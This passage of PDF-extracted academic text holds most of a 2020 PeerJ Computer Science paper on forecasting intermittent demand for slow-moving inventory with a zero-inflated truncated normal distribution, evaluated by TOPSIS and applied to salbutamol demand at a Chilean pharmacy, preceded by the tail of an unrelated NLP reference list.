Singer. 2003 Feature-rich Part-of-speech Tagging with a Cyclic Dependency Network In Pro- ceedings of the 2003 Human Language Technology Conference of the North American Chapter of the Asso- ciation for Computational Linguistics. Association for Computational Linguistics, 173-180. Xuchen Yao, Benjamin Van Durme, Chris Callison-Burch, and Peter Clark. 2013a. A Lightweight and High Per- formance Monolingual Word Aligner. In Proceedings of the 51st Annual Meeting of the Association for Com- putational Linguistics. Association for Computational Linguistics, 702-707. Xuchen Yao, Benjamin Van Durme, Chris Callison-Burch, and Peter Clark. 2013b. Semi-Markov Phrase-based Monolingual Alignment. In Proceedings of the 2013 Conference on Empirical Methods in Natural Language Processing. Association for Computational Linguistics, 590-600. Xuchen Yao, Benjamin Van Durme, Chris Callison-Burch, and Peter Clark. 2013c. Answer Extraction as Se- quence Tagging with Tree Edit Distance. In Proceed- ings of the 2013 Conference of the North American Chapter of the Association for Computational Linguis- tics. Association for Computational Linguistics, 858- 867. 230 work_kblwcbmnbbepdezi4zkqcjbydy ---- Submitted 17 June 2020 Accepted 20 August 2020 Published 14 September 2020 Corresponding author Fernando Rojas, fernando.rojas@uv.cl Academic editor Ka-Chun Wong Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.298 Copyright 2020 Rojas et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Managing slow-moving item: a zero- inflated truncated normal approach for modeling demand Fernando Rojas1,2, Peter Wanke3, Giuliani Coluccio4, Juan Vega-Vargas4 and Gonzalo F. Huerta-Canepa5 1 Micro-BioInnovation Center, Universidad de Valparaíso, Valparaíso, Chile 2 School of Nutrition and Dietetics, Universidad de Valparaiso, Chile, Valparaíso, Chile 3 COPPEAD, Universidade Federal do Rio de Janeiro, Rio de Janeiro, Brazil 4 Department of Industrial and Systems Engineering, Faculty of Engineering, Universidad de Tarapacá, Arica, Chile 5 Faculty of Engineering and Sciences, Universidad Adolfo Ibáñez, Viña del Mar, Chile ABSTRACT This paper proposes a slow-moving management method for a system using of intermit- tent demand per unit time and lead time demand of items in service enterprise inventory models. Our method uses zero-inflated truncated normal statistical distribution, which makes it possible to model intermittent demand per unit time using mixed statistical distribution. We conducted numerical experiments based on an algorithm used to forecast intermittent demand over fixed lead time to show that our proposed distributions improved the performance of the continuous review inventory model with shortages. We evaluated multi-criteria elements (total cost, fill-rate, shortage of quantity per cycle, and the adequacy of the statistical distribution of the lead time demand) for decision analysis using the Technique for Order of Preference by Similarity to Ideal Solution (TOPSIS). We confirmed that our method improved the performance of the inventory model in comparison to other commonly used approaches such as simple exponential smoothing and Croston’s method. We found an interesting association between the intermittency of demand per unit of time, the square root of this same parameter and reorder point decisions, that could be explained using classical multiple linear regression model. We confirmed that the parameter of variability of the zero- inflated truncated normal statistical distribution used to model intermittent demand was positively related to the decision of reorder points. Our study examined a decision analysis using illustrative example. Our suggested approach is original, valuable, and, in the case of slow-moving item management for service companies, allows for the verification of decision-making using multiple criteria. Subjects Algorithms and Analysis of Algorithms, Data Science, Optimization Theory and Computation, Scientific Computing and Simulation, Operating Systems Keywords Demand during lead time, Inventory models, Zero-inflated truncated normal statistical distribution INTRODUCTION AND LITERATURE REVIEW Intermittent demand occurs when the demand per unit of time (DPUT) for products, parts, or pieces in some periods is zero (Syntetos et al., 2016). This type of DPUT is How to cite this article Rojas F, Wanke P, Coluccio G, Vega-Vargas J, Huerta-Canepa GF. 2020. Managing slow-moving item: a zero- inflated truncated normal approach for modeling demand. PeerJ Comput. Sci. 6:e298 http://doi.org/10.7717/peerj-cs.298 https://peerj.com/computer-science mailto:fernando.rojas@uv.cl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.298 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.298 often considered as a random variable due to its stochastic nature (Cattani, Jacobs & Schoenfelder, 2011). Intermittent DPUT a common occurrence for service and commercial companies that supply parts to industry sectors such as aerospace (Ayu Nariswari, Bamford & Dehe, 2019), automotive (Zhang & Xiaofeng, 2017), information technology (Antosz & Ratnayake, 2019), and military (Babai, Syntetos & Teunter, 2014). This particular frequency in demand could impact different company strategies (Pavlas et al., 2017; Devika et al., 2016), such as the use of inventory models (Jonkman, Barbosa-Póvoa & Bloemhof, 2019). Inventory models reduce costs and establish optimal stock levels in order to meet the demand for components and final products for customers (Rojas et al., 2019). However, in models predicting zero demand, its parameters are not calculated the same because demand is characterized by intermittency, and the particularities of the intermittent demand need to be considered to develop more accurate inventory models (Gregersen & Hansen, 2018). Inventory models that consider this type of demand are called slow-moving items (Hahn & Leucht, 2015). Intermittent DPUT is also characterized by high variability across the non-zero values that compose the demand, requiring precise forecast models to be used in inventory models(Kim & Kim, 2016). Traditional inventory models are based on a fixed demand (Teixeira, Lopes & Figueiredo, 2018). However, updated models should factor in the uncertainty of demand (Aloulou, Dolgui & Kovalyov, 2014). The uncertainty of DPUT and lead time demand (LTD) is a crucial aspect in supply chain management (Khosravi et al., 2018). One of the most commonly used models in service company supply is the Q,r model, which is a continuous review inventory model system (Ponte et al., 2018; Wen et al., 2020). This model reorders a fixed quantity (Q) in a single period and makes a purchase or production order under an on-hand inventory level named the reorder point (r). We only need the average DPUT forecast to determine Q, but knowing the complete LTD distribution is required to determine r. In order to facilitate calculations, a normal distribution for both DPUT and LTD is usually assumed (Johnson, Kotz & Balakrishnan, 1994). Nevertheless, other distributions used to model DPUT, lead time (LT), and LTD can provide more accurate inventory modeling. Table 1 in Cobb, Rumí & Salmerón (2013) provides a summary of the distributions used in stochastic inventory models. Although the normal distributed Q,r model is competent at inventory management, applying it in models of intermittent demand could produce biased results. Normal distribution does not work in intermittent demand modeling because it is difficult to predict empirical variation produced between non-zero and zero DPUTs. To address this problem and to treat this kind of data, several forecasting methods have been developed such as the: simple statistical smoothing methods, Croston’s variant of exponential smoothing (Croston, 1972; Kourentzes, 2014), and bootstrap methods (Willemain, Smart & Schwarz, 2004; Ewbank et al., 2020). Among these, the bootstrap methods have shown the best precision in updating the LTD and distributing the underlying probability of non-zero values. However, all of these methods have problems in providing precise estimates, given that the overdispersion of data coming from an intermittent DPUT negatively affects parameters estimation and truncated probability distributions. (Zeileis, Kleiber & Jackman, 2008) and (Yang, 2012) improved parameter estimation using the maximum likelihood Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 2/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 method that combines variable counts, zero mass points called hurdle models, truncated counts on the left, and censored counts on the right called zero-adjusted models. These distributions may be especially suitable for intermittent demand because of their ability to explicitly model non-zero and zero demand cases. Statistical mixture distribution models can describe, estimate and simulate these types of data (Bethea, 2018). Here we highlight the Q,r model and its use in slow-moving items. Using zero-inflated statistical distribution modeling intermittent demand, appears promising, but its inventory modeling performance has not been adequately evaluated or compared to other methods (Ünlü, 2011). Our objective was to propose slow-moving item management model that uses the statistical distribution of mixture, zero-inflated truncated normal (ZITNO), where the Normal distribution component’s domain is defined only in Real positive, to model intermittent DPUT forecasting with non-zero values and the LTD by means of a zero- inflated truncated normal sum (ZITNOsum). We examined their performance using a continuous review with a shortage inventory model that included total costs of inventory, fill-rate, the quantity of inventory shortage per cycle, and the statistical distribution of LTD. In ’Background’, we describe the background of our proposal. We explain how to generate and implement several intermittent DPUT forecast models, including one predicting LTD when LT is constant. We use the following statistical distributions: ZITNO / ZITNO sum, Simple exponential smoothing / Simple exponential smoothing sum, and Croston’s / Croston’s sum, a Simple exponential smoothing method variant. ‘Numerical Experiments and Illustrative Example’ is divided into three parts. ‘Evaluating inventory model performance measures using TOPSIS’ shows the numerical experiments we conducted to show the benefits of our proposed model. We compared different inventory models with multi-criteria decisions using the Technique for Order of Preference by Similarity to Ideal Solution (TOPSIS) when the statistical distributions modeled the DPUT and LTD. In ‘Effect of variability and intermittent DPUT with ZITNO statistical distribution on total costs and Q and r decisions’, we determine the parameter of variability and how the proportion of zeros contained in the ZITNO statistical distribution affected total costs, Q and r. In ‘Analyzing real data using an illustrative example’, we show a decision analysis using an illustrative example. Finally, in ‘Discussion’, we discuss our findings, the limitations of the study, and our conclusions. BACKGROUND Forecasting intermittent DPUT and LTD In this section, we show how to forecast an item’s complete LTD distribution. Let Y be an random variable of the DPUT. This DPUT is intermittent, meaning that , sometimes it is zero and sometimes it is not. This creates great variability in the data. Let S be the LTD, which corresponds to a random sum that is expressed as: S= T+K∑ t=T+1 Yt, (1) Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 3/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 where K is the fixed LT used for forecasting LTD, with mean E(K)=µK and variance Var(K)=σ2K =0. We consider K fixed when calculating LTD random variables using the formula {YT+1+···+YT+K,k ∈N}. We calculate the LTD mean using the formulas E({YT+1+···+YT+K})=µS and variance Var({YT+1+···+YT+K})=σ2S . (Willemain, Smart & Schwarz, 2004) found that intermittent DPUT is often executed in strokes with longer sequences of zeros and other non-zero values. For this reason, it is possible to use a pattern of autocorrelation and a Markov process of two first-order states can be used to forecast this random variable with temporal sequence. Starting with a prediction of the sequence of zero and non-zero values during the K LT periods, these forecasts are conditioned to determine whether the last demand, YT , is zero or non-zero. Using the counts of a historical or simulated demand time series, it possible to estimate the probabilities of state transitions (Mosteller & Tukey, 1977). Scientific computing and simulation overlay play fundamental roles in generating knowledge and studying decision- making (Salvatier, Wiecki & Fonnesbeck, 2016). It is therefore necessary to assign numeric values to non-zero predictions that cannot be based on unrealistic bootstraps, particularly those with poorly estimated LTD distribution tails made with values from the same historical data set. This problem is solved with jittering, defined as adding some random variations assumed with normal distribution in order to allow the use of values closer to the historical data. We adapted this method to generate a LTD jitter that is able to occupy an intermittent DPUT in a simulation approach for slow-moving items. A summary of this approach can be found in Algorithm 1. The execution of Algorithm 1 requires R software, a free software for statistics and graphs that is used across the international scientific community, and can be consulted in the codes attached to this work with the name of ‘‘Jitter.R’’. (Rojas, 2016) used this software in supply models and programmed an R code in a generalized linear model (GLM) environment. This allowed them to generate a sequence of random values following the statistical distribution ZITNO, as well as to estimate the parameters of this statistical distribution, among other functionalities. The rmarkovchain command of R package markovchain generates a random sequence of zero/non-zero markers of a known length for an random variable using an estimated transition probability matrix (Spedicato, 2015). Modeling DPUT and LTD with a constant LT In this subsection we show three statistical distributions that can be occupied when modeling of random variable DPUT, and three modeling distributions of the LTD, which is the sum of this random variable in a constant LT. These three pairs of statistical distributions are: Simple exponential smoothing /Simple exponential smoothing sum, Croston’s / Croston’s sum and ZITNO / ZITNOsum. For all cases, the following models assume that DPUT forecast are generated from a time T +1,...,T +m. For the LTD, it is assumed that LT is constant (µK ). DPUT and LTD forecasts are generated from Algorithm 1. Simple exponential smoothing / Simple exponential smoothing sum This approach assume that LTD follows a normal statistical distribution and a fixed LT. The LTD mean and variance are calculated as follows: Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 4/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 Algorithm 1 Generating intermittent DPUT and LTD forecasts for use in a slow-moving item inventory management model 1: Generate a random sample of intermittent DPUTs of ZITNO statistical distribution of length n and fixed and known parameters. 2: Estimate the transition probability matrix of the zero and non-zero DPUTs of n generated in Step 1. 3: Conditional on the last observed demand, generate a random sequence of zero/non- zero DPUT markers of known length using the transition probability matrix estimated in Step 2. 4: Replace every non-zero state marker with a numerical value sampled at random, with replacement, from the original set of observed non-zero DPUTs generated in Step 1. 5: Estimate the parameters of normal distribution adjusted to the non-zero values of the random sample with replacement achieved in Step 4. 6: Generate a ‘‘jitter’’ of the non-zero DPUT values, replacing the non-zero markers generated in Step 3 with random numbers generated from the normal statistical distribu- tion with estimated parameters in Step 5. 7: From the sample ‘‘jitter’’ obtained in Step 6, sum the values over the horizon of a constant LT to get LTD forecast values. (i) Considering the mean level of DPUT as µSES, and estimate using µSES= 1 T+m T+m∑ t=T+1 (γyt +(1−γ)µt−1SES), where γ is a smoothing constant between 0 and 1, selected to minimize ∑T+m t=T+1(yt − µSES)2,t =T+1,...,T+m. To initialize the smoothing, we can use the average of the first two demands µo= y1+y2 2 . (ii) The DPUT variance with this approach can be calculated from: Var(Y )=σ2SES= 1 T+m T+m∑ t=T+1 (yt −µSES) 2 ,∀y. The mean of K demands over the LT (µSSES) is given by µSSES =µKµSES, and the variance of K demands over the lead time (σ2SES) is calculated using one-step ahead forecast difference between the actual DPUT data and the mean lag, using the expression σ2SES = 1 m ∑T+m t=T+1(yt −µt−1SES) 2. The variance of the LTD distribution (σ2SSES) can be estimated as: σ 2 SSES =σ 2 SESµK . Croston’s / Croston’s sum variant of Simple exponential smoothing method Croston’s approach considers the DPUT mean using exponential smoothing that is separate from: Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 5/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 (i) the mean intervals of data conformed between non-null demands (here, the smoothed estimate is denoted by It ) and (ii) the mean sizes of these intervals (here, the smoothed estimate is denoted by St ). In addition, q is the time interval since the last non-zero demand. Croston’s approach can be described as follows: if Y =0, then St =St−1 It = It−1 q =q+1, (2) else St =γYt +(1−γ)St−1 It =γq+(1−γ)It−1 q =1. (3) The combination of the size and interval estimates from Eqs. (2) and (3), the DPUT mean can be expressed as: µCROST = 1 T+m T+m∑ t=T+1 ( St It ) These estimates update whenever a demand non null realization occurs. When a demand occurs during the same review interval, Croston’s approach is identical to conventional exponential smoothing, where St =µtCROST . To initialize Croston’s approach, we use the time until the first event and the size of the first event. The DPUT variance when using this method can be expressed as: Var(Y )=σ2CROST = 1 T+m T+m∑ t=T+1 (yt −µCROST ) 2 . Croston’s method also considers LTD with a constant LT and normal statistical distribution. The mean is expressed as: µSCROST =µKµCROST, and the variance is calculated as: σ 2 SCROST =σ 2 CROSTµK . Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 6/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 Zero inflated truncated normal / zero inflated truncated normal sum In this model, we assumed that DPUT has a ZITNO distribution and LTD has a ZITNOsum distribution with a constant LT. We estimated the mean level of DPUT (µZITNO) and its variance (σ2ZITNO) using: E(Y )=µZITNO=(1−ν) ∫ Ry>0 yφ (y−µNO σNO ) 1 σNO dy;with y >0, and Var(Y )=σ2ZITNO= 1 T+m T+m∑ t=T+1 (yt −µZITNO) 2 , respectively, where µNO and σNO are mean parameters and the standard deviation (SD) of a normal distribution of subset y >0. Note that Y forecasting length measures from T+1 to T+m. On the other hand, the expected LTD value (µSZITNOsum) and its variance (σ 2 SZITNO ) under ZITNOsum distribution is calculated by: µSZITNOsum =µKµZITNO, and σ 2 SZITNOsum =σ 2 ZITNOµK, respectively. Intermittent DPUT and LTD in the Q,r model with shortage In Q,r model with shortage, the expected annual total cost is the a sum of: (i) the product of the expected product stock quantity (in units) and holding cost per product unit per year (HC); (ii) the product of the expected number of orders per year and the ordering cost(OC), and finally (iii) the product of the unit punishment cost (SC) per units of the item in short supply, the expected number of orders per year, and the expected number of units of shortage product per year, which is a function of the reorder point (S(r)). We assumed that the organization maintains intermittent demand every day of the year (365). The expected total cost per year (TC) in the (Q,r) model can be expressed as: TC=G(Q,r)= ( Q 2 +r−µS ) HC+ 365µ Q OC+S(r) 365µ Q SC, (4) where µand µS values (note that the sequence of values of Y forecast values from T+1 to T+m, and that the DPUT sum needed to forecast the LTD is calculated using LT = K), can be calculated according to the probabilistic modeling showed in Tables 1 and 2. For diverse DPUT and LTD statistical distributions, see the probability density functions (PDFs), cumulative distribution functions (CDFs) and parameters in Tables 1 and 2(Hadley & Whitin, 1963; Johnson & Montgomery, 1974; Silver, Pyke & Peterson, 1998). Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 7/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 Table 1 Modeling DPUT. Distribution PDF CDF Parameters ZITNO (1−ν)φ( y−µNO σNO ) 1 σNO 1(y>0) ν+(1−ν)8( y−µNO σNO ) µNO ∈R,σNO >0 +ν1(y=0) ,0<ν <1 Simple exponential smoothing φ( y−µSES σSES ) 1 σSES 8( y−µSES σSES ) µSES ∈R,σSES >0 Croston’s φ( y−µCROST σCROST ) 1 σCROST 8( y−µCROST σCROST ) µCROST ∈R,σCROST >0 Table 2 Modeling LTD. Distribution PDF CDF Parameters ZITNOsum (1−νs)φ( s−µNOµk σNO(µk ) ) 1 σNO(µk ) 1(s>0) νs+(1−νs)8( s−µNOµk σNO(µk ) ) µNOµk ∈R,σNO(µk)>0 +νs1(s=0) ,µk = 2,0<νs <1 Simple exponential smoothing sum φ( s−µSESµk σSESµk ) 1 σSESµk 8( s−µSESµk σSESµk ) µSESµk ∈R,σSESµk >0 Croston’s sum φ( s−µCROST µk σCROST µk ) 1 σCROST µk 8( s−µCROST µk σCROST µk ) µCROSTµk ∈R,σCROSTµk >0 In this formula, 365µ corresponds to the expected annual demand, to express the annual costs referred to in Eq. (4). However, µS does not require this transformation. Q and r correspond to lot size decision variable to order and reorder points, respectively. S(r) is the expected shortage per cycle calculated as: S(r)= ∫ smax r (s−r)fS(s)ds, (5) where smax is the maximum LTD value and the LTD PDF is denoted by fS(·). This expression can also be calculated using different assumptions LTD PDF assumptions shown in Table 2. For any statistical distribution of DPUT and LTD, we can solver Eq. (4) using an iterative method, considering an initial solution of Q= √ 2Coµ Ch (Nahmias, 2001). Here, the probability of obtaining a stockout when given the complement of the CDF (Fs(r)) can be expressed as: 1−Fs(r)= QHC µSC . To calculate the argument of this function (r), we applied this inverse function: r =F−1s (1− QHC µSC ). (6) To estimate the expected vale of S(r) function in Eq. (5) and to find the optimum lot size, we used: Q= √ 2µ(OC+S(r)) HC . (7) We repeated Eqs. (6) and (7) until we reached a value of variation smaller than a previously established minimum threshold. We were then able to calculate lower Q∗,r∗ values than Eq. (4). Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 8/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 Measuring inventory model performance In this Section, we will define some previously proposed general performance measures to evaluate a continuous review inventory model. These measures are applicable for the DPUT and LTD modeling shown in Tables 1 and 2. We will define four measures of performance: total costs, expected shortage per cycle, fill-rate, and the Kullback–Leibler divergence. Finally, we present a multi-criteria decision analysis method using TOPSIS that occupies the previously indicated performance measures as criteria to evaluate DPUT and LTD modeling alternatives. Total cost of continuous review with the shortage inventory model By carrying out the iterations shown in a previous subsection, we calculated the decision variables that minimize the total cost of continuous review with shortage inventory model TC=G(Q∗,r∗), applied to Eq. (4) for each model in Tables 1 and 2. An inventory model is more effective when it results in a lower annual cost. Expected shortage per cycle We used a previously explained performance measurement to obtain the value of the expected amount of shortage per cycle (S(r∗)) given in Eq. (5), for each of the tested models in Tables 1 and 2. An inventory model is more effective when it results in a lower expected shortage per cycle. Fill-rate (Sobel, 2004) defined the fill-rate of a supply system as: ‘‘the fraction of demand that is met from on-hand inventory, understanding that the satisfaction of the demand is restricted to the amount purchased and available’’. We calculated the Fill-rate for each statistical distribution shown in Tables 1 and 2 using Eq. (8): Fill−rate= ∫ Q∗ o yf (y)dy∫ my 0 yf (y)dy , (8) where f (y) are the PDFs that are shown in Table 1, and my is the maximal DPUT for each of the evaluated distributions. An inventory model is more effective when its Fill-rate indicator value is closer to 1. Kullback–Leibler divergence To determine the quality of the proposed PDF and LTD approximation in Table 2, we used the Kullback–Leibler divergence (Cobb, 2004): Kullback– Leibler= ∫ ∞ −∞ log ( f (x) f̃ (x) ) f (x)dx, (9) where f (·) is the unknown true PDF and f̃ (·) its approximation. To calculate the Kullback– Leibler divergence show in (9), we used the kernel estimate to establish the true PDF (Langseth et al., 2014). Using Eq. (1), we computed the sequence {s1,...,sn} of n LTD realizations (or data). According to the data, we defined the kernel estimate of the unknown Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 9/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 PDF of LTD fS(·) using: f̂S(s)= 1 nh n∑ i=1 K ( si−s h ) , s≥0, (10) where K(·) is a kernel function satisfying ∫ ∞ 0 K(x)ds=1, h a smoothing parameter and s the point at which the PDF is estimated. Once Eq. (10) has been calculated, the Kullback–Leibler divergence for each LTD distribution established in Table 2 with support [a,b] can be expressed as: Kullback– Leibler′= ∫ b a log ( f̂S(s) f̃S(s) ) f̂S(s)ds, (11) where f̂S(s) is the kernel estimate and f̃ (s) are the approximations proposed in Table 2. We selected one of the approximations with a smaller Kullback–Leibler value than the one calculated using Eq. (11). TOPSIS This multi-criteria decision analysis analyzes the geometric distances between a chosen solution, the ideal solution, and the least suitable solution (Yoon & Hwang, 1995; Aye, Gupta & Wanke, 2018; De Andrade, Antunes & Wanke, 2020). NUMERICAL EXPERIMENTS AND ILLUSTRATIVE EXAMPLE We used Algorithm 1 to generate intermittent DPUT and intermittent LTD. We performed 5000 repetitions or scenarios of DPUT samples using a ZITNO statistical distribution length n=30, with the parameters µNO =12 and σNO =1, a random proportion of zeros in the sample (ν), and an uniform generation in the interval [0,1]. This framework is applicable to each of the 5000 scenarios of the Montecarlo (MC) study, where we assumed an expected LTD value = 2 periods. For each scenario, we generated 200 DPUT data ‘‘jitter’’ simulated from the transition matrix of the Markov chain. Therefore, each LTD scenario had a length of 100 periods. For each scenario, we also generated uniform order costs (OC∼U[17;140]), holding costs (HC∼U[0;0.68]) and shortage costs (SC∼U[5;50]). These coefficients were chosen based on see Table 2 and Appendix C in (Wanke, 2014). To model the intermittent DPUT we used the statistical distributions in Table 1, and to model LTD we used the statistical distributions shown in Table 2. Next, we estimated the parametersof normalDPUTand LTDprobabilitydistribution usingthe fitDist command of the gamlss package, and the ets and crost commands of the tsintermittent for Simple exponential smoothing and Croston’s method in R software. We occupied both of these parameters as the OC,HC and SC coefficients to obtain Q∗,r∗, and Tc values in Eq. (4) for each scenario. Interested readers can consult the codes attached to this work under the names ‘‘ZITNO.R’’ and ‘‘TOPSISSimulation.R’’. Evaluating inventory model performance measures using TOPSIS In this subsection, we used the TOPSIS method to evaluate the performance of a continuous review inventory models with shortage. The DPUT/LTD modeling pairs were Simple Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 10/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 exponential smoothing / Simple exponential smoothing sum, Croston’s /Croston’s sum and ZITNO/ZITNOsum. Figure 1 compare boxplots (A) to (O) of performance measures of TC, S(r) and Kullback–Leibler divergence, segmented in data groups formed according to the level of intermittency of the DPUT (0 <ν < 0.2 , 0.2 <ν < 0.4, 0.4 <ν < 0.6, 0.6 <ν < 0.8 and 0.8<ν <1 ), between the proposal statistical distributions for results of 5000 scenarios of indicated inventory model. In this figure we have labeled Simple Exponential Smoothing as SES. Note that for all level of intermittency of the DPUT, except to 0 <ν < 0.2 the indicated performance measures of inventory model are lower using the ZITNO statistical distribution. We confirm this statement using the respective Kruskall-Wallis tests (results not shown). In the case of the fill-rate comparison there were no differences, and its median was always 1 in all the cases of intermittent levels of the DPUT and for all the statistical distributions studied (results not shown). Table 3 shows the ranked % of TOPSIS order for each probability distribution model, segmented by intermittency level of the DPUT. Note that in all cases, the statistical distribution ZITNO get better performance in the inventory model of continuous review with shortage, occupying a multi-criteria evaluation of decisions using TOPSIS. Effect of variability and intermittent DPUT with ZITNO statistical dis- tribution on total costs and Q and r decisions This subsection discusses more in-depth how the parameter of variability (σNO) and the proportion of zeros (ν) used to define the ZITNO statistical distribution affect the total costs and Q and r decisions. With this objective, we repeated the simulation scheme proposed in ‘Numerical Experiments and Illustrative Example’, but considered a more significant DPUT variability, setting the parameter at σNO = 3, and maintaining the parameter at µNO= 12. Figure 2 shows scatterplots between the proportion of zeros in the DPUT (ν, labeled in x-axe as propDPUT) and TC, and Q and r decisions, in scenarios where σNO = 1 and σNO= 3. We explored these relationships using classical multiple linear regression analysis, where to avoid the problem of multicollinearity we used standardized values of the independent variables ν and √ ν (Aiken, West & Reno, 1991). Table 4 shows only the relationship between r ∼ ν+ √ ν (σNO = 1). In this model the adjusted R- squared is 0.90. Note that the regressor of ν is negative and significant, while the regressor of √ ν is positive and significant. These relationships can be explained by the expression of r =µKµZITNO +z √ σ2SZITNOsum =µKµZITNO +z √ σ2ZITNOµK = µKµZITNO+z √ 1 T+m ∑T+m t=T+1(yt −µZITNO) 2µK , where z is a security quantile of a standard normal distribution, and µZITNO=(1−ν) ∫ Ry>0 yφ (y−µNO σNO ) 1 σNO dy;with y >0. Then, when ν decreases (there are more non-zero demands), r increases to have enough stock to deal with this situation, while when √ ν increases, the variance of the DPUT also increases, therefore it requires a larger safety stock and r to have enough stock for this case. Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 11/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 Figure 1 Comparative boxplots (A) to (O) between proposal statistical distributions of TC, S(r) and Kullback–Leibler divergence segmented by ν. Full-size DOI: 10.7717/peerjcs.298/fig-1 Finally, we compared the differences between the optimal TCs, and the Q and r decisions where σNO= 1 and σNO= 3. Table 5 depicts descriptive measures such as mean, sd , interquartile range, and 0, 25, 50, 75 and 100-th quantiles of r under both scenarios. We found significant differences for the Wilcoxon signed-rank test with continuity correction regarding r decisions. Analyzing real data using an illustrative example In order to show proposed method using real data, we selected a product experiencing intermittent demand from the inventory of a Chilean public pharmacy. First, we carried Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 12/22 https://peerj.com https://doi.org/10.7717/peerjcs.298/fig-1 http://dx.doi.org/10.7717/peerj-cs.298 Table 3 Rank TOPSIS order (%) for statistical distributions compared. Distributions ν Rank TOPSIS order (%) 1 2 3 ZITNO/ 0.8<ν <1 97 2,74 0,26 ZITNOSUM 0.6<ν <0.8 99 0,85 0,15 0.4<ν <0.6 94 5,03 0,97 0.2<ν <0.4 98 1,96 0,04 0<ν <0.2 98 1,9 0,1 Simple exponential smoothing / 0.8<ν <1 0,06 93,37 6,57 Simple exponential smoothing sum 0.6<ν <0.8 0,07 90,19 9,74 0.4<ν <0.6 0,02 91,56 8,42 0.2<ν <0.4 0,04 94,62 5,34 0<ν <0.2 0,07 90,06 9,87 Croston’s / Croston’s sum 0.8<ν <1 2,94 3,89 93,17 Croston’s sum 0.6<ν <0.8 0,93 8,96 90,11 0.4<ν <0.6 5,98 3,41 90,61 0.2<ν <0.4 1,96 3,42 94,62 0<ν <0.2 1,93 8,04 90,03 out a statistical DPUT study using an adapted ZITNO statistical distribution. Second, we evaluated the performance of a Q,r supply model with a DPUT shortage and ZITNO statistical distribution. Case presentation. Public pharmacies in Chile do not base their supply practices on drug availability (Rojas et al., 2019). Instead, they manage and maintain a mix of inventory. As shown in (Rojas et al., 2019), models that factor in uncertain demands and shortages are useful for pharmacies. Currently, Chilean pharmacies manage their orders based on an annual needs planning with divided monthly orders and can be corrected up or down 20%, depending on the amount of inventory on hand. This method tries to comply with pharmaceutical safety recommendations, but suffers from supply decisions based on scientific criteria. This consequently increases total costs related to inventory management. Therefore, it is necessary to design a supply policy that minimizes involved costs, considers drug demands, and ensures that patients receive their treatments on time. In this illustration, we carried out a statistical study of the DPUT for one product used in asthma treatments (called salbutamol) in an anonymous Chilean public hospital pharmacy. We proposed an optimized inventory system with reduced costs. Statistical study of the data set. We studied a data set of the daily demand of salbutamol inhalators. The data set spanned 180 days. In order to study the temporal dependence of this data set, we looked at its autocorrelation function (ACF) and partial ACF (PACF) of DPUT, considering and not considering the null values (zeros). Figure 3 shows plots of the ACFs and PACFs. We detected a small partial autocorrelation when the null data (zeros) were included, which may be due to the fact that the article obeys a medical prescription Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 13/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 0.0 0.4 0.8 0 2 0 0 4 0 0 6 0 0 8 0 0 a) PropDPUT T C 0.0 0.4 0.8 0 5 0 0 0 0 1 0 0 0 0 0 1 5 0 0 0 0 b) PropDPUT Q 0.0 0.4 0.8 1 0 2 0 3 0 4 0 c) PropDPUT r 0.0 0.4 0.8 0 2 0 0 4 0 0 6 0 0 8 0 0 d) PropDPUT T C 0.0 0.4 0.8 0 1 0 0 0 0 2 0 0 0 0 3 0 0 0 0 e) PropDPUT Q 0.0 0.4 0.8 0 1 0 2 0 3 0 4 0 5 0 f) PropDPUT r Figure 2 Scatterplots: (A) TC∼ν(σNO =1), (B) Q∼ν(σNO =1), (C) r ∼ν(σNO =1), (D) TC∼ν(σNO = 3), (E) Q∼ν(σNO =3), and (F) r ∼ν(σNO =3). Full-size DOI: 10.7717/peerjcs.298/fig-2 Table 4 Relationship between r ∼ν+ν (σNO =1). Estimate Std. Error t value Pr(>|t|) (Intercept) 21.9553 0.2838 77.36 0.0000 ν −93.7066 0.8109 −115.56 0.0000 √ ν 80.2420 1.0007 80.19 0.0000 Table 5 Descriptive measures of r decisions (scenarios where σNO =1 and σNO =3). r decisions mean sd IQR 0% 25% 50% 75% 100% r(σNO =1) 28.67 9.71 13.36 1.86 22.90 32.04 36.26 47.13 r(σNO =3) 30.28 10.28 14.88 1.34 23.50 33.66 38.38 48.81 Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 14/22 https://peerj.com https://doi.org/10.7717/peerjcs.298/fig-2 http://dx.doi.org/10.7717/peerj-cs.298 0 5 10 15 20 0 .0 0 .4 0 .8 Lag A C F a) ACF Series with zeros 5 10 15 20 − 0 .1 0 .1 0 .2 Lag P a rt ia l A C F b) PACF Series with zeros 0 5 10 15 20 − 0 .2 0 .2 0 .6 1 .0 Lag A C F c) ACF Series withouth zeros 5 10 15 20 − 0 .2 0 .0 0 